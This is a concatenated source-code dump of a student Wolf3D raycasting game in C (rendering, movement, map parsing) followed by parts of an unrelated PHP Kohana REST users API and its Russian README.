OBJDIR = ./objs/
all: obj libft mlx $(NAME)
# Create the object directory before compiling into it.
obj:
	mkdir -p $(OBJDIR)
# Pattern rule: compile each source file into its object file.
$(OBJDIR)%.o:$(SRCDIR)%.c
	$(GCC) $(LIBINC) $(MLXINC) -I $(INCDIR) -o $@ -c $<
libft: $(LIBFT)
mlx: $(MLX)
# Build the two support libraries with their own Makefiles.
$(LIBFT):
	make -C ./libft
$(MLX):
	make -C ./minilibx
# Link the final executable.
$(NAME): $(OBJ)
	$(GCC) -o $(NAME) $(OBJ) $(MLXLINK) $(LIBLINK)
clean:
	rm -rf $(OBJDIR)
	make -C ./libft clean
	make -C ./minilibx clean
fclean: clean
	rm -rf $(NAME)
	make -C ./libft fclean
re: fclean all
<file_sep>/srcs/hooks.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* hooks.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:50:27 by jolam #+# #+# */
/* Updated: 2019/05/23 03:08:00 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
/*
** Clears the window and renders a fresh frame from the current player
** state.  Registered as the mlx loop hook whenever movement happens.
*/
int redraw(t_mlx *m)
{
	mlx_clear_window(m->mlx_ptr, m->win_ptr);
	drawframe(m);
	return (0);
}
/*
** Window-close handler: stops the forked child process (m->frk, the
** background music per the README) and exits the program.
*/
int closep(t_mlx *m)
{
	kill(m->frk, SIGTSTP);
	exit(0);
	return (0);
}
/*
** Key-press dispatcher.  53 quits; the remaining code pairs map two keys
** each onto move/strafe/rotate loop hooks (assumed macOS keycodes for
** the arrow keys plus WASD/QE -- confirm against an mlx keycode table).
*/
int keyhandle(int key, t_mlx *m)
{
	mlx_hook(m->win_ptr, 3, 0, hooks, m);
	if (key == 53)
	{
		kill(m->frk, SIGTSTP);
		exit(0);
	}
	else if (key == 126 || key == 13)
		mlx_loop_hook(m->mlx_ptr, forward, m);
	else if (key == 125 || key == 1)
		mlx_loop_hook(m->mlx_ptr, back, m);
	else if (key == 123 || key == 0)
		mlx_loop_hook(m->mlx_ptr, leftstrafe, m);
	else if (key == 124 || key == 2)
		mlx_loop_hook(m->mlx_ptr, rightstrafe, m);
	else if (key == 12 || key == 6)
		mlx_loop_hook(m->mlx_ptr, left, m);
	else if (key == 14 || key == 7)
		mlx_loop_hook(m->mlx_ptr, right, m);
	return (0);
}
/*
** Entry hook: registers key-press (event 2) and window-close (event 17)
** handlers, arms redraw after any movement key, then enters the mlx
** event loop (mlx_loop never returns).
*/
int hooks(int key, t_mlx *m)
{
	if (key == 53)
		exit(0);
	mlx_hook(m->win_ptr, 2, 0, keyhandle, m);
	mlx_hook(m->win_ptr, 17, (1L << 17), closep, m);
	if (key == 126 || key == 125 || key == 123 || key == 124 ||
		key == 13 || key == 1 || key == 2 || key == 0 ||
		key == 12 || key == 6 || key == 14 || key == 7)
		mlx_loop_hook(m->mlx_ptr, redraw, m);
	mlx_loop(m->mlx_ptr);
	return (0);
}
<file_sep>/libft/get_next_line.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* get_next_line.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/01/09 17:21:20 by knguyen- #+# #+# */
/* Updated: 2019/05/23 01:16:34 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "libft.h"
/*
** Extracts one line from the buffered data of a single fd.  If the
** buffer holds a '\n', copies everything before it into *line and keeps
** the remainder in *ldt (freeing the buffer once fully consumed);
** otherwise the whole buffer becomes the last line.  Always returns 1.
*/
static int append_line(char **ldt, char **line)
{
	int i;
	char *temp;
	i = 0;
	while ((*ldt)[i] != '\n' && (*ldt)[i] != '\0')
		i++;
	if ((*ldt)[i] == '\n')
	{
		*line = ft_strsub(*ldt, 0, i);
		temp = ft_strdup(&((*ldt)[i + 1]));
		free(*ldt);
		*ldt = temp;
		if (!(*ldt)[0])
			ft_strdel(ldt);
	}
	else
	{
		*line = ft_strdup(*ldt);
		ft_strdel(ldt);
	}
	return (1);
}
/*
** Maps the final read() result onto get_next_line's return codes:
** -1 on read error, 0 at EOF with nothing buffered for this fd,
** otherwise extract the next buffered line (returns 1).
*/
static int ret_check(char **ldt, char **line, int ret, int fd)
{
	if (ret < 0)
		return (-1);
	else if (ret == 0 && !ldt[fd])
		return (0);
	else
		return (append_line(&ldt[fd], line));
}
/*
** Reads BUFF_SIZE chunks from fd into a static per-fd buffer until a
** newline appears or EOF, then hands off to ret_check/append_line.
** NOTE(review): the 4864-entry table caps the supported fd range; an fd
** >= 4864 would index out of bounds -- confirm callers stay below it.
*/
int get_next_line(const int fd, char **line)
{
	static char *ldt[4864];
	char buffer[BUFF_SIZE + 1];
	int ret;
	char *temp;
	if (fd < 0 || !line)
		return (-1);
	while ((ret = read(fd, buffer, BUFF_SIZE)) > 0)
	{
		buffer[ret] = '\0';
		if (!ldt[fd])
			ldt[fd] = ft_strdup(buffer);
		else
		{
			temp = ft_strjoin(ldt[fd], buffer);
			free(ldt[fd]);
			ldt[fd] = temp;
		}
		if (ft_strchr(ldt[fd], '\n'))
			break ;
	}
	return (ret_check(ldt, line, ret, fd));
}
<file_sep>/includes/wolf3d.h
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* wolf3d.h :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/04 15:30:05 by knguyen- #+# #+# */
/* Updated: 2019/05/23 03:08:11 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef WOLF3D_H
# define WOLF3D_H
# define WIDTH 1200
# define HEIGHT 900
# include "libft.h"
# include <stdlib.h>
# include "mlx.h"
# include <math.h>
# include <time.h>
# include <fcntl.h>
# include <signal.h>
# include <unistd.h>
/*
** Global program state shared by every module: mlx handles, the frame
** image buffer, the player camera, the parsed map and texture data.
*/
typedef struct s_mlx
{
	/* mlx connection, window and frame-image handles */
	void *mlx_ptr;
	void *win_ptr;
	void *img_ptr;
	/* image properties returned by mlx_get_data_addr */
	int bpp;
	int endian;
	int linesize;
	/* player position in map-grid coordinates */
	double posx;
	double posy;
	/* facing direction vector and saved copies used during rotation */
	double dirx;
	double diry;
	double dirxsave;
	double planexsave;
	/* camera plane (perpendicular to dir; its length sets the FOV) */
	double planex;
	double planey;
	/* parsed map grid and the raw pixel buffer of the frame image */
	int **map;
	char *data;
	double frames;
	double posxs;
	double posys;
	/* pid of the forked child process (killed on exit) */
	pid_t frk;
	/* scratch indices and the start-cell flag used while parsing */
	int i;
	int j;
	int flag;
	/* map dimensions: tokens per line (mapw) and line count (maph) */
	int mapw;
	int maph;
	/* per-tick rotation and movement speeds */
	double rotspeed;
	double movespeed;
	/* texture pixel buffers, xpm handle, texture size and sampling state */
	char *tex[10];
	void *xpm;
	int ts;
	int texnum;
	unsigned int color;
	int texx;
	int texy;
	double wallx;
} t_mlx;
/*
** Scratch state used while reading and splitting the map file.
*/
typedef struct s_reader
{
	int fd;
	int t;
	char *line;
	char **temp;
} t_reader;
/*
** Per-ray state for one screen column: ray direction, DDA stepping
** variables, the wall hit, and floor-casting interpolation values.
*/
typedef struct s_frame
{
	/* camera-space x of this column and the resulting ray direction */
	double camerax;
	double raydirx;
	double raydiry;
	/* current grid cell visited by the DDA */
	int mapx;
	int mapy;
	/* DDA distances: to the next grid line, and per-cell increments */
	double sidedistx;
	double sidedisty;
	double deltax;
	double deltay;
	/* perpendicular distance to the wall that was hit */
	double walldist;
	/* floor casting: wall-base point and interpolation variables */
	double floorx;
	double floory;
	double playerdist;
	double curdist;
	double weight;
	double curfloorx;
	double curfloory;
	/* DDA step direction per axis (+1 / -1) */
	int changex;
	int changey;
	/* hit flag and which wall face was struck (0 = x-side, 1 = y-side) */
	int wall;
	int side;
	/* vertical extent of the wall slice on screen */
	int lineh;
	int drawstart;
	int drawend;
} t_frame;
void calc_perp_wall(t_mlx *m, t_frame *frame);
void calc_textures(t_mlx *m, t_frame *frame);
void calc_floor_dist(t_mlx *m, t_frame *frame);
void draw_wall(t_mlx *m, t_frame *frame, int x);
void draw_floor_ceiling(t_mlx *m, t_frame *frame, int x);
void calc_wall_hit(t_mlx *m, t_frame *frame);
void init_ray(t_mlx *m, t_frame *f, int x);
void calc_dist(t_mlx *m, t_frame *frame);
int redraw(t_mlx *m);
void drawframe(t_mlx *m);
int hooks(int key, t_mlx *m);
int keyhandle(int key, t_mlx *m);
int forward(t_mlx *m);
int back(t_mlx *m);
int right(t_mlx *m);
int left(t_mlx *m);
int leftstrafe(t_mlx *m);
int rightstrafe(t_mlx *m);
void fixmap(t_mlx *m);
int floodfill(t_mlx *m, int x, int y);
void readfile(char *file, t_mlx *m);
void setup(t_mlx *m);
void setup_textures(t_mlx *m);
#endif
<file_sep>/srcs/map.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* map.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:57:46 by jolam #+# #+# */
/* Updated: 2019/05/23 03:03:37 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
/*
** Checks one map cell: value 9 marks the (unique) player start -- the
** position is recorded, the cell is cleared to walkable 0, and a second
** start aborts with an error.  Any value outside 0..9 is rejected.
*/
static void update_pos(t_mlx *m, int j, int i)
{
	if (m->map[j][i] == 9)
	{
		if (m->flag >= 1)
			ft_putstrexit("Error: Map has more than 1 start");
		m->posx = j;
		m->posy = i;
		m->flag++;
		m->map[j][i] = 0;
	}
	else if (m->map[j][i] > 9 || m->map[j][i] < 0)
		ft_putstrexit("Error: Map has invalid wall number");
}
/*
** Scans the whole grid once: update_pos() records the single player
** start (cell value 9) and rejects invalid cell values.  Exits with an
** error if no start cell was found anywhere in the map.
** (An unused local variable `c` was removed.)
*/
static void validate(t_mlx *m)
{
	int i;
	int j;

	m->flag = 0;
	i = -1;
	while (++i < m->mapw)
	{
		j = -1;
		while (++j < m->maph)
			update_pos(m, j, i);
	}
	if (m->flag == 0)
		ft_putstrexit("Error: Map has no start");
}
/*
** Second pass over the map file: frees the first-line split left over
** from readfile(), re-opens the file, splits every line on spaces and
** converts each token into m->map with ft_atoi.  A row whose token
** count differs from mapw aborts (map must be rectangular).  Finishes
** by validating the completed grid.
*/
static void fillmap(t_mlx *m, t_reader *r, char *file)
{
	m->i = -1;
	while (r->temp[++m->i])
		free(r->temp[m->i]);
	free(r->temp);
	r->fd = open(file, O_RDONLY);
	m->i = 0;
	while (get_next_line(r->fd, &r->line) > 0)
	{
		r->temp = ft_strsplit(r->line, ' ');
		free(r->line);
		m->j = -1;
		while (r->temp[++m->j])
			m->map[m->i][m->j] = ft_atoi(r->temp[m->j]);
		m->j != m->mapw ? ft_putstrexit("Invalid Map: Map not rectangular") : 0;
		m->i++;
		m->j = -1;
		while (r->temp[++m->j])
			free(r->temp[m->j]);
		free(r->temp);
	}
	close(r->fd);
	validate(m);
}
/*
** Loads the map file: rejects directories and missing files, measures
** the width from the first line's token count and the height by
** counting lines, allocates the maph x mapw int grid, then delegates
** the actual parsing to fillmap().
*/
void readfile(char *file, t_mlx *m)
{
	t_reader r;
	r.t = -1;
	m->mapw = 0;
	if ((r.fd = open(file, O_DIRECTORY)) > 0)
		ft_putstrexit("Error: Is directory");
	if ((r.fd = open(file, O_RDONLY)) < 0)
		ft_putstrexit("Error: No File");
	get_next_line(r.fd, &r.line);
	r.temp = ft_strsplit(r.line, ' ');
	free(r.line);
	while (r.temp[m->mapw])
		m->mapw++;
	m->maph = 1;
	while ((get_next_line(r.fd, &r.line)) > 0 && m->maph++)
		free(r.line);
	m->map = (int **)ft_memalloc(sizeof(int *) * m->maph);
	while (++r.t < m->maph)
		m->map[r.t] = (int *)ft_memalloc(sizeof(int) * m->mapw);
	close(r.fd);
	fillmap(m, &r, file);
}
<file_sep>/srcs/setup.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* setup.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 03:08:03 by jolam #+# #+# */
/* Updated: 2019/05/23 03:09:42 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
/*
** Initializes the camera and the mlx session: the player faces -x with
** a (0, 0.66) camera plane (roughly a 66-degree FOV), movement and
** rotation speeds are set, then the window and the frame image are
** created and the image's raw pixel buffer is grabbed into m->data.
*/
void setup(t_mlx *m)
{
	m->rotspeed = 0.05;
	m->movespeed = 0.05;
	m->dirx = -1;
	m->diry = 0;
	m->planex = 0;
	m->planey = 0.66;
	m->bpp = 8;
	m->endian = 1;
	m->linesize = 1 * WIDTH;
	m->mlx_ptr = mlx_init();
	m->win_ptr = mlx_new_window(m->mlx_ptr, WIDTH, HEIGHT, "Wolf");
	m->img_ptr = mlx_new_image(m->mlx_ptr, WIDTH, HEIGHT);
	m->data = mlx_get_data_addr(m->img_ptr, &(m->bpp),
			&(m->linesize), &(m->endian));
}
/*
** Loads the remaining wall textures into tex[6..9] (split out of
** setup_textures only to satisfy the school's function-length norm).
*/
static void setup_textures2(t_mlx *m)
{
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/redbrick.xpm",
			&m->ts, &m->ts);
	m->tex[6] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/greystone.xpm",
			&m->ts, &m->ts);
	m->tex[7] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/pillar.xpm",
			&m->ts, &m->ts);
	m->tex[8] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/green.xpm",
			&m->ts, &m->ts);
	m->tex[9] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
}
/*
** Loads the 64x64 XPM wall textures into tex[0..5]; map cell value N
** selects tex[N - 1] (see calc_textures), and tex[5] (mossy) doubles as
** the floor/ceiling texture in draw_floor_ceiling().
*/
void setup_textures(t_mlx *m)
{
	m->ts = 64;
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/wood.xpm",
			&m->ts, &m->ts);
	m->tex[0] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/bluestone.xpm",
			&m->ts, &m->ts);
	m->tex[1] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/colorstone.xpm",
			&m->ts, &m->ts);
	m->tex[2] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/eagle.xpm",
			&m->ts, &m->ts);
	m->tex[3] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/purplestone.xpm",
			&m->ts, &m->ts);
	m->tex[4] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/mossy.xpm",
			&m->ts, &m->ts);
	m->tex[5] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
	setup_textures2(m);
}
<file_sep>/srcs/move.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* move.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/10 17:31:44 by knguyen- #+# #+# */
/* Updated: 2019/05/23 17:55:58 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "../includes/wolf3d.h"
/*
** Steps forward along the direction vector.  Each axis is collision-
** checked independently against the map, so the player slides along
** walls instead of stopping dead.  Redraws the frame afterwards.
*/
int forward(t_mlx *m)
{
	m->map[(int)(m->posx + m->dirx * m->movespeed)][(int)m->posy] == 0 ?
		m->posx += m->dirx * m->movespeed : 0;
	m->map[(int)m->posx][(int)(m->posy + m->diry * m->movespeed)] == 0 ?
		m->posy += m->diry * m->movespeed : 0;
	redraw(m);
	return (0);
}
/*
** Same as forward() but steps against the direction vector.
*/
int back(t_mlx *m)
{
	m->map[(int)(m->posx - m->dirx * m->movespeed)][(int)m->posy] == 0 ?
		m->posx -= m->dirx * m->movespeed : 0;
	m->map[(int)m->posx][(int)(m->posy - m->diry * m->movespeed)] == 0 ?
		m->posy -= m->diry * m->movespeed : 0;
	redraw(m);
	return (0);
}
/*
** Rotates the direction and camera-plane vectors clockwise by rotspeed
** using a 2D rotation matrix.  dirxsave/planexsave preserve the
** pre-rotation x components so the y updates use consistent inputs.
*/
int right(t_mlx *m)
{
	m->planexsave = m->planex;
	m->dirxsave = m->dirx;
	m->dirx = m->dirx * cos(-m->rotspeed) - m->diry * sin(-m->rotspeed);
	m->diry = m->dirxsave * sin(-m->rotspeed) + m->diry * cos(-m->rotspeed);
	m->planex = m->planex * cos(-m->rotspeed) - m->planey * sin(-m->rotspeed);
	m->planey = m->planexsave * sin(-m->rotspeed)
		+ m->planey * cos(-m->rotspeed);
	redraw(m);
	return (0);
}
/*
** Mirror of right(): rotates counter-clockwise by rotspeed.
*/
int left(t_mlx *m)
{
	m->planexsave = m->planex;
	m->dirxsave = m->dirx;
	m->dirx = m->dirx * cos(m->rotspeed) - m->diry * sin(m->rotspeed);
	m->diry = m->dirxsave * sin(m->rotspeed) + m->diry * cos(m->rotspeed);
	m->planex = m->planex * cos(m->rotspeed) - m->planey * sin(m->rotspeed);
	m->planey = m->planexsave * sin(m->rotspeed)
		+ m->planey * cos(m->rotspeed);
	redraw(m);
	return (0);
}
<file_sep>/README.md
# Wolf3D
Recreating a version of FPS classic Wolfenstein 3d
42 Project: Graphics Branch
Tasked with recreating Wolf3D using the minilibx library (which allows you to open a window, draw pixels, and take keyboard input).
This project parses a file and recreates a 3d view of the map using raycasting.
Features
- Traverse the map with "WASD"
- Wall Collision
- Textured Walls, Floors and Ceilings
- Music
<file_sep>/srcs/draw_frame.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* draw_frame.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:40:51 by jolam #+# #+# */
/* Updated: 2019/05/25 21:29:53 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
/*
** Renders one full frame: for every screen column, casts a ray (DDA),
** draws the textured wall slice, then the floor and ceiling below and
** above it, and finally blits the finished image to the window.
*/
void drawframe(t_mlx *m)
{
	t_frame frame;
	int x;
	x = 0;
	while (x < WIDTH)
	{
		init_ray(m, &frame, x);
		calc_dist(m, &frame);
		calc_wall_hit(m, &frame);
		calc_perp_wall(m, &frame);
		calc_textures(m, &frame);
		draw_wall(m, &frame, x);
		calc_floor_dist(m, &frame);
		draw_floor_ceiling(m, &frame, x);
		x++;
	}
	mlx_put_image_to_window(m->mlx_ptr, m->win_ptr, m->img_ptr, 0, 0);
}
/*
** Sets up the ray for screen column x: camerax spans [-1, 1) across the
** view plane, the ray direction mixes dir and plane accordingly, the
** starting cell is the player's, and deltax/deltay are the ray lengths
** between successive x/y grid lines for the DDA.
*/
void init_ray(t_mlx *m, t_frame *frame, int x)
{
	frame->camerax = 2 * x / (double)WIDTH - 1;
	frame->raydirx = m->dirx + m->planex * frame->camerax;
	frame->raydiry = m->diry + m->planey * frame->camerax;
	frame->mapx = (int)m->posx;
	frame->mapy = (int)m->posy;
	frame->deltax = fabs(1 / frame->raydirx);
	frame->deltay = fabs(1 / frame->raydiry);
	frame->wall = 0;
}
/*
** Projects the perpendicular wall distance into a slice height, clamps
** it to the screen, and draws the column pixel by pixel, sampling
** texture column m->texx; `d` maps the screen y back into texture y.
** Hits on y-side faces are darkened (halved channels) for shading.
*/
void draw_wall(t_mlx *m, t_frame *frame, int x)
{
	int d;
	frame->lineh = (int)(HEIGHT / frame->walldist);
	frame->drawstart = -frame->lineh / 2 + HEIGHT / 2;
	if (frame->drawstart < 0)
		frame->drawstart = 0;
	frame->drawend = frame->lineh / 2 + HEIGHT / 2;
	if (frame->drawend >= HEIGHT)
		frame->drawend = HEIGHT;
	frame->drawstart--;
	while (++frame->drawstart < frame->drawend)
	{
		d = frame->drawstart * 256 - HEIGHT * 128 + frame->lineh * 128;
		m->texy = ((d * 64) / frame->lineh) / 256;
		m->color = ((unsigned int **)m->tex)[m->texnum][64
			* m->texy + m->texx];
		if (frame->side == 1)
			m->color = (m->color >> 1) & 8355711;
		((unsigned int *)m->data)[x + (WIDTH * frame->drawstart)] = m->color;
	}
}
/*
** Floor casting: from the wall's base to the bottom of the screen,
** interpolates the world point between the player and the wall hit
** (weight by distance), samples texture tex[5], and mirrors the pixel
** vertically (at half brightness) to paint the ceiling.
*/
void draw_floor_ceiling(t_mlx *m, t_frame *frame, int x)
{
	int t;
	frame->playerdist = 0;
	if (frame->drawend < 0)
		frame->drawend = HEIGHT;
	t = frame->drawend - 1;
	while (++t < HEIGHT)
	{
		frame->curdist = HEIGHT / (2.0 * t - HEIGHT);
		frame->weight = (frame->curdist - frame->playerdist) /
			(frame->walldist - frame->playerdist);
		frame->curfloorx = frame->weight * frame->floorx +
			(1.0 - frame->weight) * m->posx;
		frame->curfloory = frame->weight * frame->floory +
			(1.0 - frame->weight) * m->posy;
		m->texx = (int)(frame->curfloorx * 64) % 64;
		m->texy = (int)(frame->curfloory * 64) % 64;
		m->color = ((unsigned int **)m->tex)[5][64 *
			m->texx + m->texy];
		((unsigned int *)m->data)[x + (WIDTH * t)] = m->color;
		((unsigned int *)m->data)[x + (WIDTH * (HEIGHT - t))] = m->color / 2;
	}
}
<file_sep>/srcs/calc.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* calc.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:46:57 by jolam #+# #+# */
/* Updated: 2019/05/24 17:34:54 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
/*
** Chooses the DDA step direction per axis (changex/changey = +/-1 from
** the ray's sign) and the initial distance from the player to the
** first x and y grid lines along the ray (sidedistx/sidedisty).
*/
void calc_dist(t_mlx *m, t_frame *frame)
{
	if (frame->raydirx < 0)
	{
		frame->changex = -1;
		frame->sidedistx = (m->posx - frame->mapx) * frame->deltax;
	}
	else
	{
		frame->changex = 1;
		frame->sidedistx = (frame->mapx + 1.0 - m->posx) * frame->deltax;
	}
	if (frame->raydiry < 0)
	{
		frame->changey = -1;
		frame->sidedisty = (m->posy - frame->mapy) * frame->deltay;
	}
	else
	{
		frame->changey = 1;
		frame->sidedisty = (frame->mapy + 1.0 - m->posy) * frame->deltay;
	}
}
/*
** DDA loop: repeatedly steps to whichever grid line (x or y) is closer
** until a wall cell is reached; side records which face was struck
** (0 = x-side, 1 = y-side).  Cells > 0 are walls, except value 11,
** which is treated as passable -- presumably a special marker; confirm.
*/
void calc_wall_hit(t_mlx *m, t_frame *frame)
{
	while (frame->wall == 0)
	{
		if (frame->sidedistx < frame->sidedisty)
		{
			frame->sidedistx += frame->deltax;
			frame->mapx += frame->changex;
			frame->side = 0;
		}
		else
		{
			frame->sidedisty += frame->deltay;
			frame->mapy += frame->changey;
			frame->side = 1;
		}
		if (m->map[frame->mapx][frame->mapy] > 0 &&
			m->map[frame->mapx][frame->mapy] != 11)
			frame->wall = 1;
	}
}
/*
** Computes the exact world coordinates of the wall hit's base point
** (floorx/floory), depending on which of the four faces was struck;
** used as the far anchor for floor-casting interpolation.
*/
void calc_floor_dist(t_mlx *m, t_frame *frame)
{
	if (frame->side == 0 && frame->raydirx > 0)
	{
		frame->floorx = frame->mapx;
		frame->floory = frame->mapy + m->wallx;
	}
	else if (frame->side == 0 && frame->raydirx < 0)
	{
		frame->floorx = frame->mapx + 1;
		frame->floory = frame->mapy + m->wallx;
	}
	else if (frame->side == 1 && frame->raydiry > 0)
	{
		frame->floorx = frame->mapx + m->wallx;
		frame->floory = frame->mapy;
	}
	else
	{
		frame->floorx = frame->mapx + m->wallx;
		frame->floory = frame->mapy + 1;
	}
}
/*
** Perpendicular distance from the camera plane to the wall (this, not
** the euclidean ray length, avoids the fisheye effect), plus wallx:
** where along the wall the hit landed.  The distance is nudged away
** from zero so the slice-height division cannot blow up.
*/
void calc_perp_wall(t_mlx *m, t_frame *frame)
{
	if (frame->side == 0)
		frame->walldist = (frame->mapx - m->posx +
			(1 - frame->changex) / 2) / frame->raydirx;
	else
		frame->walldist = (frame->mapy - m->posy +
			(1 - frame->changey) / 2) / frame->raydiry;
	if (frame->side == 0)
		m->wallx = m->posy + frame->walldist * frame->raydiry;
	else if (frame->side == 1)
		m->wallx = m->posx + frame->walldist * frame->raydirx;
	if (frame->walldist < 0.01)
		frame->walldist += 0.01;
}
/*
** Converts the fractional hit position wallx into texture column texx,
** mirroring two of the four faces so textures are not drawn flipped,
** and selects the texture from the map cell value (cell N -> tex[N-1]).
*/
void calc_textures(t_mlx *m, t_frame *frame)
{
	m->wallx -= floor((m->wallx));
	m->texx = (int)(m->wallx * (double)64);
	if (frame->side == 0 && frame->raydirx > 0)
		m->texx = 64 - m->texx - 1;
	if (frame->side == 1 && frame->raydiry < 0)
		m->texx = 64 - m->texx - 1;
	m->texnum = m->map[frame->mapx][frame->mapy] - 1;
}
| b0607cc9fe59e6dcc106905ad14370c0ab0d47d8 | [
"Markdown",
"C",
"Makefile"
] | 10 | Makefile | jlamb916/Wolf3D | d0736c35311418b00905b4a20235b047f10f23a2 | e312214c26c46e282ff052b63f46908b3d18070c |
refs/heads/master | <file_sep># Тестовое задание для TurboDealer
[Действующий пример](http://turbodealer.eltigro.ru/) поднял у себя на сервере.
REST API тут - [/users/](http://turbodealer.eltigro.ru/users/), реализованы стандартные GET, POST, PUT, DELETE. По умолчанию, без параметра возвращается полный список пользователей. Ограничения по выдаче (limit) делать не стал, так как пример совсем простой и в таблице много записей не планируется. Да и не было в задаче пагинации при выводе. )
## Что использовал
- Kohana (<http://kohanaframework.org/>) - для MVC и роутинга.
- Bootstrap (<http://getbootstrap.com/>) - чтобы не возиться с вёрсткой.
- jQuery REST-плагин (https://github.com/jpillora/jquery.rest) - для удобства и компактности обращения к REST API.
## Установка
- 1) Клонировать репозиторий в папку отдельного домена в корень.
- 2) Создать базу данных (например: `turbodealer_test`).
- 3) Развернуть в неё дамп `turbodealer_test.sql` (находится в корне).
- 4) Поправить конфиг `/application/config/database.php` (он же и часть задания - хранилище данных можно изменить).
## Использование API
Способ обращения и использования API стандартен для REST. Путь обращения - `/users/`.
- `GET` `/users/` возвращает JSON-массив со всеми существующими пользователями в порядке их добавления в БД.
- `GET` `/users/<id>` возвращает JSON-массив с информацией о пользователе с идентификатором `id`.
- `POST` `/users/` с параметрами `{user_name : 'Ivan', user_surname : 'Petrov'}` добавляет нового пользователя.
- `PUT` `/users/<id>` с параметрами `{user_name : 'Ivan', user_surname : 'Petrov'}` обновляет данные пользователя с идентификатором `id`.
- `DELETE` `/users/<id>` удаляет пользователя с идентификатором `id`.
## Что смотреть
Чтобы не тратить лишнее время на поиск нужного во фреймворке:
- Роутинг: `/application/bootstrap.php`
- Контроллер: `/application/classes/Controller/Users.php`
- Модель: `/application/classes/Model/Users.php`
- Основная вьюшка: `/application/view/index.php`
- JS-логика: `/j/jcode.js`
<file_sep><?php defined('SYSPATH') or die('No direct script access.');
/**
 * API controller handling REST requests for the "Users" entity.
 * All responses are encoded as JSON.
 * Class Controller_Users
 */
class Controller_Users extends Controller {

	public $users_model;

	/**
	 * Create the model once here instead of in every action.
	 */
	public function before()
	{
		parent::before();
		$this->users_model = new Model_Users();
	}

	/**
	 * Fetch a single user's data.
	 * GET method
	 */
	public function action_get_user ()
	{
		$result = array(
			'users' => $this->users_model->getUser($this->request->param("id"))
		);
		echo json_encode($result);
	}

	/**
	 * Create a new user from the request body.
	 * POST method
	 */
	public function action_post_user ()
	{
		// POST method
		$result = array(
			'result' => $this->users_model->addUser($this->request->post())
		);
		echo json_encode($result);
	}

	/**
	 * Update an existing user's data.
	 * PUT method (body is urlencoded, parsed with parse_str)
	 */
	public function action_put_user ()
	{
		parse_str($this->request->body(), $put_data);
		$result = array(
			'result' => $this->users_model->editUser($this->request->param("id"), $put_data)
		);
		echo json_encode($result);
	}

	/**
	 * Delete a user by id.
	 * DELETE method
	 */
	public function action_delete_user ()
	{
		$result = array(
			'result' => $this->users_model->deleteUser($this->request->param("id"))
		);
		echo json_encode($result);
	}

	/**
	 * Return the full list of users.
	 */
	public function action_list ()
	{
		$result = array(
			'users' => $this->users_model->getUsers()
		);
		echo json_encode($result);
	}
}
<file_sep>-- phpMyAdmin SQL Dump
-- version 4.4.15.7
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1:3306
-- Generated: Oct 19 2016, 01:33
